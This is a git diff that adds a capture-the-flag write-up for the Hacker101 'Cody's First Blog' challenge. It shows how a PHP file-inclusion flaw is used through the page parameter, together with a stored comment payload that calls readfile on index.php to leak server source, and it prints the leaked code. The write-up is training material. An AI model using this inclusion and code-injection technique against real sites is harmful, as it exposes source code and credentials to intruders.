codys blog flag2

Author: testert1ng

README.md

@@ -11,7 +11,7 @@
 | Trivial (1 / flag)  | [A little something to get you started][2] | Web    | 1 / 1      |
 | Easy (2 / flag)     | [Micro-CMS v1][3]                          | Web    | 4 / 4      |
 | Moderate (3 / flag) | [Micro-CMS v2][5]                          | Web    | 3 / 3      |
-| Moderate (5 / flag) | [Cody's First Blog][8]                     | Web    | 2 / 3      |
+| Moderate (5 / flag) | [Cody's First Blog][8]                     | Web    | 3 / 3      |
 | Easy (4 / flag)     | [Postbook][6]                              | Web    | 7 / 7      |
 | Easy (3 / flag)     | [Petshop Pro][7]                           | Web    | 3 / 3      |
 | Moderate (5 / flag) | [TempImage][4]                             | Web    | 2 / 2      |

codys_first_blog/README.md

@@ -12,4 +12,9 @@
 - Unused code can often lead to information you wouldn't otherwise get
 - Simple guessing might help you out
 
-## [Flag2](./flag2) -- Not Found
+## [Flag2](./flag2) -- Found
+
+- Read the first blog post carefully
+- We talk about this in the Hacker101 File Inclusion Bugs video
+- Where can you access your own stored data?
+- Include doesn't just work for filenames

codys_first_blog/flag0/README.md

@@ -18,6 +18,6 @@ As the blog is PHP, try inject with PHP.
 
 ![](./imgs/comment.jpg)
 
-## 0x03 FLAG
+## 0x02 FLAG
 
 ![](./imgs/flag.jpg)

codys_first_blog/flag2/README.md

@@ -0,0 +1,65 @@
+# Cody's First Blog - FLAG2
+
+## 0x00 Modifiy URL Parameter
+
+Try modify the url
+
+http://127.0.0.1/xxxxxxxxxx/?page=admin.inc
+
+To
+
+http://127.0.0.1/xxxxxxxxxx/?page=index
+
+The error shows
+
+```
+Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 16384 bytes) in /app/index.php on line 20
+```
+
+So it will append **.php** at the end and execute the file.
+
+## 0x01 SSRF / Inclusion Bug
+
+http://127.0.0.1/xxxxxxxxxx/?page=http://localhost/index
+
+Both the XSS and phpinfo() injection executed properly.
+
+But still no flag.
+
+![](./imgs/ssrf.jpg)
+
+## 0x02 Read File
+
+Add a new comment to read index.php.
+
+``` php
+<?php echo readfile("index.php")?>
+```
+
+And approve it in admin page.
+
+![](./imgs/approve.jpg)
+
+## 0x03 FLAG
+
+Press **F12** to check the source again.
+
+![](./imgs/flag.jpg)
+
+It print out the whole index.php file.
+
+```php
+<?php
+	// ^FLAG^{FLAG2}$FLAG$
+	mysql_connect("localhost", "root", "");
+	mysql_select_db("level4");
+	$page = isset($_GET['page']) ? $_GET['page'] : 'home.inc';
+	if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:")
+		$page = "home.inc";
+
+	if(isset($_POST['body'])) {
+		mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)");
+		if(strpos($_POST['body'], '<?php') !== false)
+			echo '<p>^FLAG^{FLAG1}$FLAG$</p>'; 
+?>
+```